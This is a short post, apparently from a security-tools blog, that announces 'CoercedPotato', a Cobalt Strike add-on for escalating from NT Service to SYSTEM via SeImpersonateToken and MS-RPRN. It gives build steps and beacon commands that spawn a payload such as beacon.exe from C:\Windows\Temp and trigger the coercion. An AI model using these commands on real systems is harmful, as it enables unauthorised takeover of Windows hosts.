Privilege escalation from NT Service to SYSTEM using SeImpersonateToken privilege and MS-RPRN functions.

Heavily based

Reflective Loader from


Clone this repo and compile the project in VisualStudio then load dist/coercedpotato.cna into CobaltStrike.


You first need to spawn the RPC listener with

beacon> CoercedPotato spawn ProcessToSpawn OptionalCmdArgument

for example

beacon> CoercedPotato spawn C:\Windows\Temp\beacon.exe
beacon> CoercedPotato spawn C:\Windows\Temp\loader.exe C:\Windows\Temp\beacon.bin

then you can trigger a SYSTEM call

beacon> CoercedPotato coerce

Published by Tamil S

Tamil has a great interest in the fields of Cyber Security, OSINT, and CTF projects. Currently, he is deeply involved in researching and publishing various security tools with Kali Linux Tutorials, which is quite fascinating.

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